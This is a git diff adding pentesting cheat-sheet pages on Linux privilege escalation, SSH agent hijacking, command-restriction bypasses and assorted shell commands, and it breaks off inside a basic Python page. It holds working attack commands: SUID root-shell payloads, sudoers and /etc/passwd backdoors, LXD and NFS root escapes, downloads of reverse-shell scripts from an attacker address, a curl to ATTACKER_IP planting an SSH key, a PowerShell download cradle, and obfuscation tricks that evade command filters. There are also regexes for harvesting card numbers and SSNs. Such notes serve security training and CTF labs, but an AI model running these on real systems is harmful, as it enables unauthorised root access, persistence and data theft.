+++ b/linux-unix/privilege-escalation/lxd-privilege-escalation.md
@@ -0,0 +1,70 @@
+# lxc - Privilege escalation
+
+If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root
+
+## Exploiting without internet
+
+You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)\(follow the instructions of the github\):
+
+```text
+#Install requirements
+sudo apt update
+sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
+#Clone repo
+go get -d -v github.com/lxc/distrobuilder
+#Make distrobuilder
+cd $HOME/go/src/github.com/lxc/distrobuilder
+make
+cd
+#Prepare the creation of alpine
+mkdir -p $HOME/ContainerImages/alpine/
+cd $HOME/ContainerImages/alpine/
+cp $HOME/go/src/github.com/lxc/distrobuilder/doc/examples/alpine alpine.yaml
+#Create the container
+sudo $HOME/go/bin/distrobuilder build-lxd ubuntu.yaml
+```
+
+Then, upload to the server the files **lxd.tar.xz** and **rootfs.squashfs**
+
+Add the image:
+
+```text
+lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
+lxc image list #You can see your new imported image
+```
+
+Create a container and add root path
+
+```text
+lxc init alpine privesc -c security.privileged=true
+lxc list #List containers
+
+lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
+```
+
+Execute the container:
+
+```text
+lxc start test
+lxc exec privesc /bin/sh
+[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted 
+```
+
+## With internet
+
+You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html).
+
+```text
+lxc init ubuntu:16.04 test -c security.privileged=true
+lxc config device add test whatever disk source=/ path=/mnt/root recursive=true 
+lxc start test
+lxc exec test bash
+[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted 
+```
+
+## Other Refs
+
+{% embed url="https://reboare.github.io/lxd/lxd-escape.html" %}
+
+
+
diff --git a/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
new file mode 100644
index 00000000..b2d8b50a
--- /dev/null
+++ b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
@@ -0,0 +1,45 @@
+# NFS no\_root\_squash/no\_all\_squash misconfiguration PE
+
+Read the _**/etc/exports**_ file, if you find some directory that is configured as **no\_root\_squash**, then you can **access** it from **as a client** and **write inside** that directory **as** if you were the local **root** of the machine.
+
+**no\_root\_squash**: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications.
+
+**no\_all\_squash:** This is similar to **no\_root\_squash** option but applies to **non-root users**. Imagine, you have a shell as nobody user; checked /etc/exports file; no\_all\_squash option is present; check /etc/passwd file; emulate a non-root user; create a suid file as that user \(by mounting using nfs\). Execute the suid as nobody user and become different user.
+
+## Privilege Escalation
+
+If you have found this vulnerability, you can exploit it:
+
+* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder the **/bin/bash** binary and giving it **SUID** rights, and **executing from the victim** machine that bash binary.
+
+```bash
+#Attacker, as root user
+mkdir /tmp/pe
+mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
+cd /tmp/pe
+cp /bin/bash .
+chmod +s bash
+
+#Victim
+cd <SHAREDD_FOLDER>
+./bash -p #ROOT shell
+```
+
+* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it **SUID** rights, and **execute from the victim** machine that binary \(you can find here some[ C SUID payloads](payloads-to-execute.md#c)\).
+
+```bash
+#Attacker, as root user
+gcc payload.c -o payload
+mkdir /tmp/pe
+mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
+cd /tmp/pe
+cp /tmp/payload .
+chmod +s payload
+
+#Victim
+cd <SHAREDD_FOLDER>
+./payload #ROOT shell
+```
+
+
+
diff --git a/linux-unix/privilege-escalation/payloads-to-execute.md b/linux-unix/privilege-escalation/payloads-to-execute.md
new file mode 100644
index 00000000..6b9cbfcb
--- /dev/null
+++ b/linux-unix/privilege-escalation/payloads-to-execute.md
@@ -0,0 +1,57 @@
+# Payloads to execute
+
+## Bash
+
+```bash
+cp /bin/bash /tmp/b && chmod +s /tmp/b
+/bin/b -p #Maintains root privileges from suid, working in debian & buntu
+```
+
+## C
+
+```c
+#gcc payload.c -o payload
+int main(void){
+    setresuid(0, 0, 0); #Set as user suid user
+    system("/bin/sh");
+    return 0;
+}
+```
+
+```c
+#gcc payload.c -o payload
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+int main(){
+    setuid(getuid());
+    system("/bin/bash");
+    return 0;
+}
+```
+
+## Scripts
+
+Can you make root execute something?
+
+### **www-data to sudoers**
+
+```bash
+echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
+```
+
+### **Change root password**
+
+```bash
+echo "root:hacked" | chpasswd
+```
+
+### Add new root user to /etc/passwd
+
+```bash
+echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
+```
+
+
+
diff --git a/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md
new file mode 100644
index 00000000..4d7d7099
--- /dev/null
+++ b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md
@@ -0,0 +1,164 @@
+# SSH Forward Agent exploitation
+
+## Summary
+
+What can you do if you discover inside the `/etc/ssh_config` or inside `$HOME/.ssh/config` configuration this:
+
+```text
+ForwardAgent yes
+```
+
+If you are root inside the machine you can probably **access any ssh connection made by any agent** that you can find in the _/tmp_ directory
+
+Impersonate Bob using one of Bob's ssh-agent:
+
+```bash
+SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
+```
+
+### Why does this work?
+
+When you set the variable `SSH_AUTH_SOCK` you are accessing the keys of Bob that have been used in Bobs ssh connection. Then, if his private key is still there \(normally it will be\), you will be able to access any host using it.
+
+As the private key is saved in the memory of the agent uncrypted, I suppose that if you are Bob but you don't know the password of the private key, you can still access the agent and use it.
+
+Another option, is that the user owner of the agent and root may be able to access the memory of the agent and extract the private key.
+
+## Long explanation and exploitation
+
+**Taken from:** [**https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking/)\*\*\*\*
+
+### **When ForwardAgent Can’t Be Trusted**
+
+SSH without passwords makes life with Unix-like operating systems much easier. If your network requires chained ssh sessions \(to access a restricted network, for example\), agent forwarding becomes extremely helpful. With agent forwarding it’s possible for me to connect from my laptop to my dev server and from there run an svn checkout from yet another server, all without passwords, while keeping my private key safe on my local workstation.
+
+This can be dangerous, though. A quick web search will reveal several articles indicating this is only safe if the intermediate hosts are trustworthy. Rarely, however, will you find an explanation of _why_ it’s dangerous.
+
+That’s what this article is for. But first, some background.
+
+### **How Passwordless Authentication Works**
+
+When authenticating in normal mode, SSH uses your password to prove that you are who you say you are. The server compares a hash of this password to one it has on file, verifies that the hashes match, and lets you in.
+
+If an attacker is able to break the encryption used to protect your password while it’s being sent to the server, they can steal the it and log in as you whenever they desire. If an attacker is allowed to perform hundreds of thousands of attempts, they can eventually guess your password.
+
+A much safer authentication method is [public key authentication](http://www.ibm.com/developerworks/library/l-keyc/index.html), a way of logging in without a password. Public key authentication requires a matched pair of public and private keys. The public key encrypts messages that can only be decrypted with the private key. The remote computer uses its copy of your public key to encrypt a secret message to you. You prove you are you by decrypting the message using your private key and sending the message back to the remote computer. Your private key remains safely on your local computer the entire time, safe from attack.
+
+The private key is valuable and must be protected, so by default it is stored in an encrypted format. Unfortunately this means entering your encryption passphrase before using it. Many articles suggest using passphrase-less \(unencrypted\) private keys to avoid this inconvenience. That’s a bad idea, as anyone with access to your workstation \(via physical access, theft, or hackery\) now also has free access to any computers configured with your public key.
+
+OpenSSH includes [ssh-agent](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent), a daemon that runs on your local workstation. It loads a decrypted copy of your private key into memory, so you only have to enter your passphrase once. It then provides a local [socket](http://en.wikipedia.org/wiki/Unix_domain_socket) that the ssh client can use to ask it to decrypt the encrypted message sent back by the remote server. Your private key stays safely ensconced in the ssh-agent process’ memory while still allowing you to ssh around without typing in passwords.
+
+### **How ForwardAgent Works**
+
+Many tasks require “chaining” ssh sessions. Consider my example from earlier: I ssh from my workstation to the dev server. While there, I need to perform an svn update, using the “svn+ssh” protocol. Since it would be silly to leave an unencrypted copy of my super-secret private key on a shared server, I’m now stuck with password authentication. If, however, I enabled “ForwardAgent” in the ssh config on my workstation, ssh uses its built-in tunneling capabilities to create another socket on the dev server that is tunneled back to the ssh-agent socket on my local workstation. This means that the ssh client on the dev server can now send “decrypt this secret message” requests directly back to the ssh-agent running on my workstation, authenticating itself to the svn server without ever having access to my private key.
+
+### **Why This Can Be Dangerous**
+
+Simply put, anyone with root privilege on the the intermediate server can make free use of your ssh-agent to authenticate them to other servers. A simple demonstration shows how trivially this can be done. Hostnames and usernames have been changed to protect the innocent.
+
+My laptop is running ssh-agent, which communicates with the ssh client programs via a socket. The path to this socket is stored in the SSH\_AUTH\_SOCK environment variable:
+
+```text
+mylaptop:~ env|grep SSH_AUTH_SOCK
+SSH_AUTH_SOCK=/tmp/launch-oQKpeY/Listeners
+
+mylaptop:~ ls -l /tmp/launch-oQKpeY/Listeners
+srwx------  1 alice  wheel  0 Apr  3 11:04 /tmp/launch-oQKpeY/Listeners
+```
+
+The [ssh-add](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-add) program lets us view and interact with keys in the agent:
+
+```text
+mylaptop:~ alice$ ssh-add -l
+2048 2c:2a:d6:09:bb:55:b3:ca:0c:f1:30:f9:d9:a3:c6:9e /Users/alice/.ssh/id_rsa (RSA)
+```
+
+I have “ForwardAgent yes” in the ~/.ssh/config on my laptop. So ssh is going to create a tunnel connecting the local socket to a local socket on the remote server:
+
+```text
+mylaptop:~ alice$ ssh seattle
+
+seattle:~ $ env|grep SSH_AUTH_SOCK
+SSH_AUTH_SOCK=/tmp/ssh-WsKcHa9990/agent.9990
+```
+
+Even though my keys are not installed on “seattle”, the ssh client programs are still able to access the agent running on my local machine:
+
+```text
+seattle:~ alice $ ssh-add -l
+2048 2c:2a:d6:09:bb:55:b3:ca:0c:f1:30:f9:d9:a3:c6:9e /Users/alice/.ssh/id_rsa (RSA)
+```
+
+So… who can we mess with?
+
+```text
+seattle:~ alice $ who
+alice   pts/0        2012-04-06 18:24 (office.example.com)
+bob     pts/1        2012-04-03 01:29 (office.example.com)
+alice   pts/3        2012-04-06 18:31 (office.example.com)
+alice   pts/5        2012-04-06 18:31 (office.example.com)
+alice   pts/6        2012-04-06 18:33 (office.example.com)
+charlie pts/23       2012-04-06 13:10 (office.example.com)
+charlie pts/27       2012-04-03 12:32 (office.example.com)
+bob     pts/29       2012-04-02 10:58 (office.example.com)
+```
+
+I’ve never liked Bob. To find his agent connection, I need to find the child process of one of his ssh sessions:
+
+```text
+seattle:~ alice $ sudo -s
+[sudo] password for alice:
+
+seattle:~ root # pstree -p bob
+sshd(16816)───bash(16817)
+
+sshd(25296)───bash(25297)───vim(14308)
+```
+
+There are several ways for root to view the environment of a running process. On Linux, the data is available in /proc/&lt;pid&gt;/environ. Since it’s stored in NULL-terminated strings, I’ll use tr to convert the NULLs to newlines:
+
+```text
+seattle:~ root # tr '' 'n' < /proc/16817/environ | grep SSH_AUTH_SOCK
+SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816
+```
+
+I now have everything I need to know in order to hijack Bob’s ssh-agent:
+
+```text
+seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh-add -l
+2048 05:f1:12:f2:e6:ad:cb:0b:60:e3:92:fa:c3:62:19:17 /home/bob/.ssh/id_rsa (RSA)
+```
+
+If I happen to have a specific target in mind, I should now be able to connect directly. Otherwise, just watching the process list or grepping through Bob’s history file should present plenty of targets of opportunity. In this case, I know Bob has all sorts of super secret files stored on the server named “boston”:
+
+```text
+seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
+bob@boston:~$ whoami
+bob
+```
+
+I have succesfully parlayed my root privileges on “seattle” to access as bob on “boston”. I’ll bet I can use that to get him fired.
+
+### **Protect Yourself!**
+
+Don’t let your ssh-agent store your keys indefinitely. On OS X, configure your Keychain to lock after inactivity or when your screen locks. On other Unix-y platforms, pass the -t  option to ssh-agent so its keys will be removed after  seconds.
+
+Don’t enable agent forwarding when connecting to untrustworthy hosts. Fortunately, the ~/.ssh/config syntax makes this fairly simple:
+
+```text
+Host trustworthyhost
+  ForwardAgent yes
+```
+
+```text
+Host *
+  ForwardAgent no
+```
+
+### **Recommended Reading**
+
+* [OpenSSH key management](http://www.ibm.com/developerworks/library/l-keyc/index.html) – Daniel Robbins
+* [An Illustrated Guide to SSH Agent Forwarding](http://www.unixwiz.net/techtips/ssh-agent-forwarding.html) – Steve Friedl
+* [ssh-agent manual](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent)
+* [ssh-add manual](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-add)
+
diff --git a/linux-unix/privilege-escalation/wildcards-spare-tricks.md b/linux-unix/privilege-escalation/wildcards-spare-tricks.md
new file mode 100644
index 00000000..b93a0dc9
--- /dev/null
+++ b/linux-unix/privilege-escalation/wildcards-spare-tricks.md
@@ -0,0 +1,24 @@
+# Wildcards Spare tricks
+
+### 7z
+
+In **7z** even using `--` before `*` \(note that `--` means that the following input cannot treated as parameters, so just file paths in this case\) you can cause an arbitrary error to read a file, so if a command like the following one is being executed by root:
+
+```bash
+7za a /backup/$filename.zip -t7z -snl -p$pass -- *
+```
+
+And you can create files in the folder were this is being executed, you could create the file `@root.txt` and the file `root.txt` being a **symlink** to the file you want to read:
+
+```bash
+cd /path/to/7z/acting/folder
+touch @root.txt
+ln -s /file/you/want/to/read root.txt
+```
+
+Then, when **7z** is execute, it will treat `root.txt` as a file containing the list of files it should compress \(thats what the existence of `@root.txt` indicates\) and when it 7z read `root.txt` it will read `/file/you/want/to/read` and **as the content of this file isn't a list of files, it will throw and error** showing the content.
+
+_More info in Write-ups of the box CTF from HackTheBox._ 
+
+\_\_
+
diff --git a/linux-unix/useful-linux-commands/README.md b/linux-unix/useful-linux-commands/README.md
new file mode 100644
index 00000000..9fdd0e44
--- /dev/null
+++ b/linux-unix/useful-linux-commands/README.md
@@ -0,0 +1,259 @@
+# Useful Linux Commands
+
+## Common Bash
+
+```bash
+#Exfiltration using Base64
+base64 -w 0 file
+
+#Get HexDump without new lines
+xxd -p boot12.bin | tr -d '\n'
+
+#Add public key to authorized keys
+curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authotized_keys
+
+#Echo without new line and Hex
+echo -n -e
+
+#Count
+wc -l <file> #Lines
+wc -c #Chars
+
+#Sort
+sort -nr #Sort by number and then reverse
+cat file | sort | uniq #Sort and delete duplicates
+
+#Replace in file
+sed -i 's/OLD/NEW/g' path/file #Replace string inside a file
+
+#Download in RAM
+wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
+wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
+curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
+
+#Files used by network processes
+lsof -i #Files uses by networks processes
+lsof -i :80 #Files uses by networks processes
+fuser -nv tcp 80
+
+#Decompress
+tar -xvzf /path/to/yourfile.tgz
+tar -xvjf /path/to/yourfile.tbz
+bzip2 -d /path/to/yourfile.bz2
+tar jxf file.tar.bz2
+gunzip /path/to/yourfile.gz
+unzip file.zip
+7z -x file.7z
+sudo apt-get install xz-utils; unxz file.xz
+
+#Add new user
+useradd -p 'openssl passwd -1 <Password>' hacker  
+
+#Clipboard
+xclip -sel c < cat file.txt
+
+#HTTP servers
+python -m SimpleHTTPServer 80
+python3 -m http.server
+ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
+php -S $ip:80
+
+##Curl
+#json data
+curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
+#Auth via JWT
+curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint
+
+#Send Email
+sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
+
+#DD copy hex bin file without first X (28) bytes
+dd if=file.bin bs=28 skip=1 of=blob
+
+#Mount .vhd files (virtual hard drive)
+sudo apt-get install libguestfs-tools
+guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd
+
+## ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys
+ssh-keyscan 10.10.10.101
+
+## Openssl
+openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
+openssl x509 -in ca.cert.pem -text #Read certificate
+openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
+openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb)
+openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate
+openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
+openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
+## If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:
+openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
+# Decrypt ssh key
+openssl rsa -in key.ssh.enc -out key.ssh
+#Decrypt
+openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz
+
+#Count number of instructions executed by a program, need a host based linux (not working in VM)
+perf stat -x, -e instructions:u "ls"
+
+##Find trick for HTB, find files from 2018-12-12 to 2018-12-14
+find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -ls 2>/dev/null
+
+#Reconfigure timezone
+sudo dpkg-reconfigure tzdata
+
+#Search from wich package is a binary
+apt-file search /usr/bin/file #Needed: apt-get install apt-file
+```
+
+## Bash for Windows
+
+```bash
+#Base64 for Windows
+echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
+ 
+#Exe compression
+upx -9 nc.exe
+
+#Exe2bat
+wine exe2bat.exe nc.exe nc.txt
+
+#Compile Windows python exploit to exe
+pip install pyinstaller
+wget -O exploit.py http://www.exploit-db.com/download/31853  
+python pyinstaller.py --onefile exploit.py
+
+#Compile for windows
+i586-mingw32msvc-gcc -o executable useradd.c
+```
+
+## Greps
+
+```bash
+#Extract emails from file
+grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt
+
+#Extract valid IP addresses
+grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt
+
+#Extract passwords
+grep -i "pwd\|passw" file.txt
+
+#Extract users
+grep -i "user\|invalid\|authentication\|login" file.txt
+
+## Extract hashes
+#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})
+egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
+#Extract valid MySQL-Old hashes
+grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt
+#Extract blowfish hashes
+grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt
+#Extract Joomla hashes
+egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt
+#Extract VBulletin hashes
+egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt
+#Extraxt phpBB3-MD5
+egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt
+#Extract Wordpress-MD5
+egrep -o '$P$S{31}' *.txt > wordpress-md5.txt
+#Extract Drupal 7
+egrep -o '$S$S{52}' *.txt > drupal-7.txt
+#Extract old Unix-md5
+egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt
+#Extract md5-apr1
+egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt
+#Extract sha512crypt, SHA512(Unix)
+egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt
+
+#Extract e-mails from text files
+grep -E -o "\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b" *.txt > e-mails.txt
+
+#Extract HTTP URLs from text files
+grep http | grep -shoP 'http.*?[" >]' *.txt > http-urls.txt
+#For extracting HTTPS, FTP and other URL format use
+grep -E '(((https|ftp|gopher)|mailto)[.:][^ >"	]*|www.[-a-z0-9.]+)[^ .,;	>">):]' *.txt > urls.txt
+#Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037177-377]' '.' < *.log | grep -E "Your_Regex" OR # cat -v *.log | egrep -o "Your_Regex"
+
+#Extract Floating point numbers
+grep -E -o "^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt
+
+## Extract credit card data
+#Visa
+grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt
+#MasterCard
+grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt
+#American Express
+grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt
+#Diners Club
+grep -E -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt
+#Discover
+grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt
+#JCB
+grep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txt
+#AMEX
+grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt
+
+## Extract IDs
+#Extract Social Security Number (SSN)
+grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt
+#Extract Indiana Driver License Number
+grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt
+#Extract US Passport Cards
+grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt
+#Extract US Passport Number
+grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt
+#Extract US Phone Numberss
+grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt
+#Extract ISBN Numbers
+egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
+```
+
+## Nmap search help
+
+```bash
+#Nmap scripts ((default or version) and smb))
+nmap --script-help "(default or version) and *smb*"
+locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb
+nmap --script-help "(default or version) and smb)"
+```
+
+## Bash
+
+```bash
+#All bytes inside a file (except 0x20 and 0x00)
+for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
+```
+
+## Iptables
+
+```bash
+#Delete curent rules and chains
+iptables --flush
+iptables --delete-chain
+
+#allow loopback
+iptables -A INPUT -i lo -j ACCEPT
+iptables -A OUTPUT -o lo -j ACCEPT
+
+#drop ICMP
+iptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP
+iptables -A OUTPUT -p icmp -j DROP
+
+#allow established connections
+iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
+
+#allow ssh, http, https, dns
+iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT
+iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
+iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT
+iptables -A INPUT -p udp -m udp --sport 53 -j ACCEPT
+iptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT
+iptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT
+iptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT
+
+#default policies
+iptables -P INPUT DROP
+iptables -P FORWARD ACCEPT
+iptables -P OUTPUT ACCEPT
+```
+
diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
new file mode 100644
index 00000000..40e801a5
--- /dev/null
+++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
@@ -0,0 +1,88 @@
+# Bypass Bash Restrictions
+
+## Bypass Paths and forbidden commands
+
+```bash
+#Bash substitudes * fror any possible chat tha refers to a binary in the folder
+/usr/bin/p?ng #This equals /usr/bin/ping
+
+#Bash substitudes * fror any compatible combination with a binary in the folder
+/usr/bin/who*mi #This equals /usr/bin/whoami
+
+#[chars]
+/usr/bin/n[c] #/usr/bin/nc
+
+#Concatenatipn
+'p'i'n'g #Equals to call ping
+"w"h"o"a"m"i
+\u\n\a\m\e \-\a
+
+#Uninitialized variables: A uninitialized variable equals to null (nothing)
+p${u}i${u}n${u}g #Equals to ping, use {} to put the uninitialized variables between valid characteres
+cat$u /etc$u/passwd$u #Use the uninitilized variable without {} before any symbol
+
+#Fake commands
+p$(u)i$(u)n$(u)g #Equals to ping but 3 errors trying to exeute "u" are shown
+w`u`h`u`o`u`a`u`m`u`i #Equals to whoami but 5 errors trying to exeute "u" are shown
+
+#Concating strings using history
+!-1 #This will be substitude by the last command executed, and !-2 by the penultimate command
+mi #This will throw an error
+whoa #This will throw an error
+!-1!-2 #This will execute whoami
+
+```
+
+## Bypass forbidden spaces
+
+```bash
+##{form}
+{cat,lol.txt} #This will cat the file
+
+##IFS - Internal field separator, change " " for any othe character ("]" in this case)
+#IFS withut modifications
+cat${IFS}/etc/passwd
+cat$IFS/etc/passwd
+
+#Put the command line in a variable and then execute it
+IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
+IFS=];b=cat]/etc/passwd;$b #Using 2 ";"
+IFS=,;`cat<<<cat,/etc/passwd` #Using cat twice
+#Other way, just change each space for ${IFS}
+echo${IFS}test
+
+##Using hex format
+X=$'cat\x20/etc/passwd'&&$X
+
+##New lines
+p\
+i\
+n\
+g #This 4 lines will equal to ping
+
+##Undefined variables and !
+$u $u#This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
+uname!-1\-a #This equals to uname -a
+```
+
+## Bypass IPs
+
+```bash
+#Decimal IPs
+127.0.0.1 == 2130706433
+```
+
+## More
+
+Check more possible bypasses here: [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection\#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits)
+
+## References
+
+{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %}
+
+{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %}
+
+{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %}
+
+
+
diff --git a/misc/basic-python/README.md b/misc/basic-python/README.md
new file mode 100644
index 00000000..623e8046
--- /dev/null
+++ b/misc/basic-python/README.md
@@ -0,0 +1,315 @@
+# Basic Python
+
+## Python Basics
+
+### Usefull information
+
+It is an interpreted language  
+list\(xrange\(\)\) == range\(\) --&gt; In python3 range is the xrange of python2 \(it is not a list but a generator\)  
+The difference between a Tuple and a List is that the position of a value in a tuple gives it a meaning but the lists are just ordered values. Tuples have structures, lists have order
+
+### Main operations
+
+To raise a number you should do: 3\*\*2 \(it isn't 3^2\)  
+If you do 2/3 it returns 1 because you are dividing two ints. If you want decimals you should divide floats \(2.0/3.0\).  
+i &gt;= j  
+i &lt;= j  
+i == j  
+i != j  
+a and b  
+a or b  
+not a  
+float\(a\)  
+int\(a\)  
+str\(d\)  
+ord\("A"\) = 65  
+chr\(65\) = 'A'  
+hex\(100\) = '0x64'  
+hex\(100\)\[2:\] = '64'  
+isinstance\(1, int\) = True  
+"a b".split\(" "\) = \['a', 'b'\]  
+" ".join\(\['a', 'b'\]\) = "a b"  
+"abcdef".startswith\("ab"\) = True  
+"abcdef".contains\("abc"\) = True  
+"abc\n".strip\(\) = "abc"  
+"apbc".replace\("p",""\) = "abc"  
+dir\(str\) = List of all the availble methods  
+help\(str\) = Definition of the class str  
+"a".upper\(\) = "A"  
+"A".lower\(\) = "a"  
+"abc".capitalize\(\) = "Abc"  
+sum\(\[1,2,3\]\) = 6  
+sorted\(\[1,43,5,3,21,4\]\)
+
+**Join chars**  
+3 \* ’a’ = ‘aaa’  
+‘a’ + ‘b’ = ‘ab’  
